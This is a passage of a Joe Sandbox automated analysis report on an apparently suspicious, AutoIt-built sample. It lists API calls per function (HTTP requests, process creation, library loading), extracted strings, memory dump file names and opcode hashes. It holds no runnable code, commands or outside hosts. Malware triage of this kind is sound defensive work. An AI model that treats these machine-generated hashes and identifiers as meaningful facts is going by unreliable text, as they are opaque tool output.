                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: 6b59e282a7158498f9a7f87f0072fec7fd17cd64ae0a5b94b314208c726f7631
                                                                    • Instruction ID: 2456cbd6b3ec0909855d05314734f583082b140587f3947ed994e19fefc0a388
                                                                    • Opcode Fuzzy Hash: 6b59e282a7158498f9a7f87f0072fec7fd17cd64ae0a5b94b314208c726f7631
                                                                    • Instruction Fuzzy Hash: 92F0BE32141201ABD7112BA4EC88EEA376BFF86302B041025F603A59A8CB79AA00DF60
                                                                    APIs
                                                                      • Part of subcall function 0063F4EA: std::exception::exception.LIBCMT ref: 0063F51E
                                                                      • Part of subcall function 0063F4EA: __CxxThrowException@8.LIBCMT ref: 0063F533
                                                                    • __swprintf.LIBCMT ref: 00621EA6
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00621D49
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 2125237772-557222456
                                                                    • Opcode ID: 69828da9ce720ca72cc5f4f4c4f0ab1d71c00f5d9c2b0122c30e732617c75423
                                                                    • Instruction ID: 80e7818247058ad2ac6e7083538ea7eef9ef15b725f87502923bc2037c0e533d
                                                                    • Opcode Fuzzy Hash: 69828da9ce720ca72cc5f4f4c4f0ab1d71c00f5d9c2b0122c30e732617c75423
                                                                    • Instruction Fuzzy Hash: B3919C71108621AFCB64EF24D895CAEB7EABF95710F01491DF8859B2A1DB30ED04CF96
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0067B006
                                                                    • CharUpperBuffW.USER32(?,?), ref: 0067B115
                                                                    • VariantClear.OLEAUT32(?), ref: 0067B298
                                                                      • Part of subcall function 00669DC5: VariantInit.OLEAUT32(00000000), ref: 00669E05
                                                                      • Part of subcall function 00669DC5: VariantCopy.OLEAUT32(?,?), ref: 00669E0E
                                                                      • Part of subcall function 00669DC5: VariantClear.OLEAUT32(?), ref: 00669E1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4237274167-1221869570
                                                                    • Opcode ID: 25b433081be54217ba86c89686ffd10337282e91aebfb7297bd0c4910b5e3d33
                                                                    • Instruction ID: a091105ea34733b471c7ea8288182086e9aa328c6ea32c6fcceab7d4be9aac84
                                                                    • Opcode Fuzzy Hash: 25b433081be54217ba86c89686ffd10337282e91aebfb7297bd0c4910b5e3d33
                                                                    • Instruction Fuzzy Hash: 3E918E706083019FCB50DF24D491AAEB7F6EF89714F04886DF89A9B362DB31E905CB52
                                                                    APIs
                                                                      • Part of subcall function 0063C6F4: _wcscpy.LIBCMT ref: 0063C717
                                                                    • _memset.LIBCMT ref: 00665438
                                                                    • GetMenuItemInfoW.USER32(?), ref: 00665467
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00665513
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0066553D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                    • String ID: 0
                                                                    • API String ID: 4152858687-4108050209
                                                                    • Opcode ID: 9b0931c5f5aca05ebdbd595b174e40dce540e44f729ecac99f7ba864c2d428e3
                                                                    • Instruction ID: d26a91ebb1a6ae16686e4cfe9db565726cb875029b4e8462aeba9c7f1c18e2a4
                                                                    • Opcode Fuzzy Hash: 9b0931c5f5aca05ebdbd595b174e40dce540e44f729ecac99f7ba864c2d428e3
                                                                    • Instruction Fuzzy Hash: 1D510371604B019BD7549F28C8866ABB7EBAF86710F04062EF897D7291EB70CD448B92
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0066027B
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006602B1
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006602C2
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00660344
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: bada436ac57bdcd9e5cdaa28f416506b4ce854ebdcf39f9666c126b2d5159e78
                                                                    • Instruction ID: 9ab249ac6c8dee6f3d8564842db9cb66fff1cdecb190209b8c0d1135fa0b935c
                                                                    • Opcode Fuzzy Hash: bada436ac57bdcd9e5cdaa28f416506b4ce854ebdcf39f9666c126b2d5159e78
                                                                    • Instruction Fuzzy Hash: FC414A71600205EFEB15DF54C884B9B7BBAEF45315B1480ADE909AF306D7B1DE44CBA0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00665075
                                                                    • GetMenuItemInfoW.USER32 ref: 00665091
                                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 006650D7
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006E1708,00000000), ref: 00665120
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1173514356-4108050209
                                                                    • Opcode ID: 0a00e32ceb9ee45e2e5111aa4f3418b92c00986d7787f4774b02454821384e15
                                                                    • Instruction ID: 109d1e35ed921f494e2f9bc715fad5584e7c76749ea3a701d6ca756b3b5cc8d5
                                                                    • Opcode Fuzzy Hash: 0a00e32ceb9ee45e2e5111aa4f3418b92c00986d7787f4774b02454821384e15
                                                                    • Instruction Fuzzy Hash: 9141C2712047019FD720DF24D886B6AF7E6EF8A324F144A1EF99697391D730E904CB66
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00680587
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 2358735015-567219261
                                                                    • Opcode ID: 7e2af4b3c443e2730745aa68ac70626441627b0be754de36831b4254054a3219
                                                                    • Instruction ID: 56999acf69b6933cd74ee26da070eb6e73d919259dc86d84128c7dfa20bf6ca2
                                                                    • Opcode Fuzzy Hash: 7e2af4b3c443e2730745aa68ac70626441627b0be754de36831b4254054a3219
                                                                    • Instruction Fuzzy Hash: 4431BE30900616AFDF40EF54C9419EEB3B6FF55314B008A2EE826A77D1EB71E959CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0065B88E
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0065B8A1
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0065B8D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: 595b3ae54d48a70e949e7d4522aec8180d371d96329c92ea70f03fcdb2c8f6ab
                                                                    • Instruction ID: 3b81461086c5a6ca53b716c5aae6b4ea33aa9c0526584b447561060c0761442c
                                                                    • Opcode Fuzzy Hash: 595b3ae54d48a70e949e7d4522aec8180d371d96329c92ea70f03fcdb2c8f6ab
                                                                    • Instruction Fuzzy Hash: F9212371900108BFDB44AB68D886DFE777EDF16361F10612DF822A72E1DB741D0A8B64
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00674401
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00674427
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00674457
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0067449E
                                                                      • Part of subcall function 00675052: GetLastError.KERNEL32(?,?,006743CC,00000000,00000000,00000001), ref: 00675067
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 1951874230-3916222277
                                                                    • Opcode ID: 83a57f22445db8ed72109152e0a2429ad8cb9afb47a1c69508a539bda4d4f073
                                                                    • Instruction ID: 257e5e72c45e3be8652f5b3086ba097f65c256f5e73d5bf65233a171fd67a7dc
                                                                    • Opcode Fuzzy Hash: 83a57f22445db8ed72109152e0a2429ad8cb9afb47a1c69508a539bda4d4f073
                                                                    • Instruction Fuzzy Hash: 712180B1500208BEE711AF64CC89EFF76EEEB49754F10C01AF10A96240DF759D05A7B0
                                                                    APIs
                                                                      • Part of subcall function 0063D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063D1BA
                                                                      • Part of subcall function 0063D17C: GetStockObject.GDI32(00000011), ref: 0063D1CE
                                                                      • Part of subcall function 0063D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063D1D8
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0068915C
                                                                    • LoadLibraryW.KERNEL32(?), ref: 00689163
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00689178
                                                                    • DestroyWindow.USER32(?), ref: 00689180
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 4146253029-1011021900
                                                                    • Opcode ID: 445c8859ba1b048b38434858bd63ca3da648989d61316e3b0aa58b4500d9e8db
                                                                    • Instruction ID: 72fbaecb83e18360910eedbb59c3fb4a0f245141e42dc79963524831b55ecee9
                                                                    • Opcode Fuzzy Hash: 445c8859ba1b048b38434858bd63ca3da648989d61316e3b0aa58b4500d9e8db
                                                                    • Instruction Fuzzy Hash: 9C21C271204206BBEF106E64DC88EFA37AFEF96364F181318F991A2290C771DC42A770
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00669588
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006695B9
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 006695CB
                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00669605
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: a9bb12c21a555aa947f0aef034e7bbb58cb4e52f51fc8d1f685ee9f0e41d9c02
                                                                    • Instruction ID: 99e7cc3404b4275b4d565073c4214282af02aaaafacaa46ee6bb8b5665b825b6
                                                                    • Opcode Fuzzy Hash: a9bb12c21a555aa947f0aef034e7bbb58cb4e52f51fc8d1f685ee9f0e41d9c02
                                                                    • Instruction Fuzzy Hash: 2C215170600205ABDB219F25DC05ADA77EEAF85720F204A19FDA2D73D0D770E945CB30
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00669653
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00669683
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00669694
                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006696CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: 1581f1df1456957b88ba414ce0b46a8b4ca00ad4cbf7918ce189e7c2a74bd39f
                                                                    • Instruction ID: 6684d62094f6545c8f45f6612ebc43690830fc69b19466f646a74caa3543034c
                                                                    • Opcode Fuzzy Hash: 1581f1df1456957b88ba414ce0b46a8b4ca00ad4cbf7918ce189e7c2a74bd39f
                                                                    • Instruction Fuzzy Hash: 43216D716003059BEB209F6ADC44EDA77EEAF45720F200A19FDA1E73D0EB70A945CB65
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066DB0A
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0066DB5E
                                                                    • __swprintf.LIBCMT ref: 0066DB77
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,006BDC00), ref: 0066DBB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu
                                                                    • API String ID: 3164766367-685833217
                                                                    • Opcode ID: da67573d89774dc801671f102ed2458964406babf1f5a32248bb59a1cbbeb039
                                                                    • Instruction ID: 2159c9e136166f2d26772cc32fb64647eb914a79b0917414437db33659d4ed57
                                                                    • Opcode Fuzzy Hash: da67573d89774dc801671f102ed2458964406babf1f5a32248bb59a1cbbeb039
                                                                    • Instruction Fuzzy Hash: B2218375A00108AFCB50EF64D985DEEBBBAEF49714B004069F505DB251DB70EA41CF65
                                                                    APIs
                                                                      • Part of subcall function 0065C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065C84A
                                                                      • Part of subcall function 0065C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065C85D
                                                                      • Part of subcall function 0065C82D: GetCurrentThreadId.KERNEL32 ref: 0065C864
                                                                      • Part of subcall function 0065C82D: AttachThreadInput.USER32(00000000), ref: 0065C86B
                                                                    • GetFocus.USER32 ref: 0065CA05
                                                                      • Part of subcall function 0065C876: GetParent.USER32(?), ref: 0065C884
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0065CA4E
                                                                    • EnumChildWindows.USER32(?,0065CAC4), ref: 0065CA76
                                                                    • __swprintf.LIBCMT ref: 0065CA90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                    • String ID: %s%d
                                                                    • API String ID: 3187004680-1110647743
                                                                    • Opcode ID: a9318bc356426b188b59e68732b4f0c6b17fd71c03a4e6383949178d9358a4fb
                                                                    • Instruction ID: a1b4103fa706212590df24983d108ae8185ae020c6f3652ae4f7f30a5ef82c4e
                                                                    • Opcode Fuzzy Hash: a9318bc356426b188b59e68732b4f0c6b17fd71c03a4e6383949178d9358a4fb
                                                                    • Instruction Fuzzy Hash: EE11E1B16003097BCF41BFA0DC85FE93B6EAF44725F00806AFE08AA182CB709549CB74
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 00647AD8
                                                                      • Part of subcall function 00647CF4: __mtinitlocknum.LIBCMT ref: 00647D06
                                                                      • Part of subcall function 00647CF4: EnterCriticalSection.KERNEL32(00000000,?,00647ADD,0000000D), ref: 00647D1F
                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00647AE5
                                                                    • __lock.LIBCMT ref: 00647AF9
                                                                    • ___addlocaleref.LIBCMT ref: 00647B17
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                    • String ID: `j
                                                                    • API String ID: 1687444384-3808571552
                                                                    • Opcode ID: 83fc2610b7628ac71339fd2ef52c859d103d7b022798c9b4a6cdf77d5bbceddf
                                                                    • Instruction ID: ba098d806d09e72d992dddd56e1b4ed784dea62705c7dabf32aec509ec8a2f9c
                                                                    • Opcode Fuzzy Hash: 83fc2610b7628ac71339fd2ef52c859d103d7b022798c9b4a6cdf77d5bbceddf
                                                                    • Instruction Fuzzy Hash: 0B016D71404B00DFD760EF75D90574ABBF2EF51321F20890EE49A976A0CBB0A680CB45
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0068E33D
                                                                    • _memset.LIBCMT ref: 0068E34C
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006E3D00,006E3D44), ref: 0068E37B
                                                                    • CloseHandle.KERNEL32 ref: 0068E38D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
